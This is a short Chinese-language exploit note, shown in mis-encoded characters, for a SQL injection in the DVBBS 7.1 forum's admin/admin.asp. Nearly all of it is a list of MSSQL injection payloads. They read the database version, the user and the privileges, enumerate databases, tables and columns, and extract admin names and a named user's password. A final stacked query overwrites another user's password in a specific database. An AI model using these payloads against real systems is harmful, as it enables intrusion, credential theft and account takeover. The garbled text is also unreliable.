漏洞測(cè)試環(huán)境:DVBBS7.1 SQL 

受影響文件 
admin/admin.asp 
..... 

漏洞利用 

(select @@version)>0 獲得Windows的版本號(hào) 
and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶(hù)是不是sa 
(select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶(hù) 
(select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫(kù) 
(select IS_MEMBER('db_owner')) --查詢(xún)數(shù)據(jù)庫(kù)當(dāng)前用戶(hù)權(quán)限 

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查詢(xún)所有數(shù)據(jù)庫(kù)名 
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查詢(xún)數(shù)據(jù)庫(kù)表名 
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查詢(xún)數(shù)據(jù)庫(kù)所有表名 
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查詢(xún)表名ID 
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查詢(xún)字段名 
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查詢(xún)所有字段名 
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查詢(xún)用戶(hù) 
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查詢(xún)用戶(hù)bluefire密碼 
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--